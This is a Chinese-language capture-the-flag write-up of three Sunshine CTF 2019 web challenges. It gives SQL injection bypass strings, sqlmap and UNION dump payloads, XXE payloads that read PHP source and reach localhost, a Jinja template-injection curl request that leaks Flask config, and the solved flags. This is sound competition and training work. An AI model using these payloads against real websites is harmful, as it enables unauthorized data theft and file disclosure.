Sunshine CTF 2019 Web

Z3R0YU

2019-04-02

0x00 前言

比赛地址: https://2019.sunshinectf.org/challenges

时间: 星期日, 30 三月 2019, 1:00 AM (1:00) — 星期一, 01 四月 2019, 1:00 PM (13:00)

0x01 WrestlerBook

1.题目描述

WrestlerBook is the social network for wrestlers, by wrestlers. WrestlerBook is exclusively for wrestlers, so if you didn’t get an invite don’t even bother trying to view our profiles.

http://bk.sunshinectf.org

Author: dmaria

2.解题思路

看到登录界面先尝试使用万能密码进行fuzz一下

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' or 1;#

最终发现' or 1=1--等几个可以成功登录，并且在登录之后我发现存在flag关键词并且对应的值为N/A

并且在fuzz过程中发现会出现如下错误

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 01 Apr 2019 14:24:46 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.0.33
Content-Length: 380
Connection: Close

<br />
<b>Warning</b>:  SQLite3::query(): Unable to prepare statement: 1, unrecognized token: &quot;#&quot; in <b>/var/www/html/login.php</b> on line <b>19</b><br />
<br />
<b>Fatal error</b>:  Uncaught Error: Call to a member function fetchArray() on boolean in /var/www/html/login.php:20
Stack trace:
#0 {main}
  thrown in <b>/var/www/html/login.php</b> on line <b>20</b><br />

其实后面的工作可以直接使用sqlmap来进行了

要注意一下sqlite中包含各种信息的表是sqlite_master。

所以使用sqlmap默认去跑的话是注不出数据的首先猜解下sqlite_master表中的信息

1	sqlmap -r sqli.txt -T "sqlite_master" --columns

可以看到关键信息有name，但是关键的sql就没有显示之后查name中有什么信息

1	sqlmap -r sqli.txt -T "sqlite_master" -C "name" --dump

但是直接注name中的user表，是跑不出信息的。所以我们查一下sql表中的信息，看user表是怎样构成的

1	sqlmap -r sqli.txt -T "sqlite_master" -C "sql" --dump

表结构出来了之后直接查flag就好了。

1	sqlmap -r sqli.txt --sql-query="SELECT group_concat(flag) FROM users"

屏幕快照 2019-04-02 上午9.17.45.png

手动注入参考： https://ctftime.org/writeup/14208

关键payload记录

1 2	Username: admin Password: ' union SELECT 1, 2, group_concat(name), 4, group_concat(sql), 6, 7, 8 FROM sqlite_master WHERE type = "table";#

获取表的结构

CREATE TABLE `users` (
    `username`  TEXT,
    `password`  TEXT,
    `avatar`    TEXT,
    `age`   INTEGER,
    `name`  TEXT,
    `title` TEXT,
    `flag`  TEXT,
    `id`    INTEGER PRIMARY KEY AUTOINCREMENT
),CREATE TABLE sqlite_sequence(name,seq)

dump flag

1
2

Username: admin
Password: ' union SELECT group_concat(username), group_concat(password), group_concat(avatar), group_concat(age), group_concat(name), group_concat(title), group_concat(flag), group_concat(id) FROM users;#

返回值

<div class="desc">Flag: N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,example_flag,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,sun{ju57_4n07h3r_5ql1_ch4ll},N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A,N/A</div>

0x02 Wrestler Name Generator

1.题目描述

Even better than the Wu-Tang name generator, legend has it that Hulk Hogan used this app to get his name.

http://ng.sunshinectf.org

Author: dmaria

2.解题思路

关键点：可以看到我输入的名称之后还是完成的进行了显示，服务端脚本是PHP，并且请求的Accept字段中有xml，所以猜测可能是XXE

注意在使用paylaod是要先base64后url编码进一步使用如下不合法的XML数据进行测试

1 2	<xml version="abc" ?> <Doc/>

观察到报错

确认是xxe漏洞，之后使用如下payload尝试去读取generate.php的源代码

1	<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE test [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=generate.php'>]><input><firstName>&xxe;</firstName></input>

服务端的源代码如下

<?php

$whitelist = array(
    '127.0.0.1',
    '::1'
);
// if this page is accessed from the web server, the flag is returned
// flag is in env variable to avoid people using XXE to read the flag
// REMOTE_ADDR field is able to be spoofed (unless you already are on the server)
if(in_array($_SERVER['REMOTE_ADDR'], $whitelist)){
	echo $_ENV["FLAG"];
	return;
}
// make sure the input parameter exists
if (empty($_GET["input"])) {
	echo "Please include the 'input' get parameter with your request, Brother";
	return;
}

// get input
$xmlData = base64_decode($_GET["input"]);
// parse xml
$xml=simplexml_load_string($xmlData, null, LIBXML_NOENT) or die("Error parsing XML: "."\n".$xmlData);
$firstName = $xml->firstName;
$lastName = $xml->lastName;
// generate name
$nouns = array("Killer", "Savage", "Stallion", "Coder", "Hacker", "Slasher", "Crusher", "Barbarian", "Ferocious", "Fierce", "Vicious", "Hunter", "Brute", "Tactician", "Expert");
$noun = $nouns[array_rand($nouns)];
$generatedName = $firstName.' "The '.$noun.'" '.$lastName;

// return html for the results page
echo <<<EOT
<!DOCTYPE html>
<html lang="en">
<head>
  <title>Wrestler Name Generator</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
</head>
<body>

<div class="jumbotron text-center">
  <h1>Your Wrestler Name Is:</h1>
  <h2>$generatedName</h2> 
<!--hacker name functionality coming soon!-->
<!--if you're trying to test the hacker name functionality, make sure you're accessing this page from the web server-->
<!--<h2>Your Hacker Name Is: REDACTED</h2>-->
  <a href="/">Go Back</a> 
</div>
</body>
</html>
EOT;
?>

从源码上来看只要从本地访问generate.php文件就可以获取flag，所以使用如下payload

1	<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE test [<!ENTITY xxe SYSTEM 'http://localhost/generate.php'>]><input><firstName>&xxe;</firstName></input>

返回的结果 sun{1_l0v3_hulk_7h3_3x73rn4l_3n717y_h064n}

0x03 Portfolio

1.题目描述

Check out my development portfolio! I’m just getting started, so don’t be too mean :(

http://folio.sunshinectf.org

Author: dmaria

2.解题思路

首先web框架是flask；其次可以看到URL后面的参数是name，而页面对应的也是name；如果修改为zeroyu，则页面对应也显示zeroyu

但是如果我输入9的话并不会产生对应的计算

之后访问另外一个界面，查看源代码发现一行提交信息被注释掉了，编辑html将注释去除并进行提交。

但是并没有什么效果，所以不妨直接访问一下对应的路径，而不使用这个模板参数。 http://folio.sunshinectf.org/templates/admin.html 得到一些返回信息

1	{% if config.DEBUG %} {{config.FLAG}} {% endif %} Hi there!

所以可以看到flag是在config中的，所以我们构造如下payload并利用http://folio.sunshinectf.org/render这个点，最终成功get flag

1	curl -i http://folio.sunshinectf.org/render --data "template=hello/{{config.items()}}" -L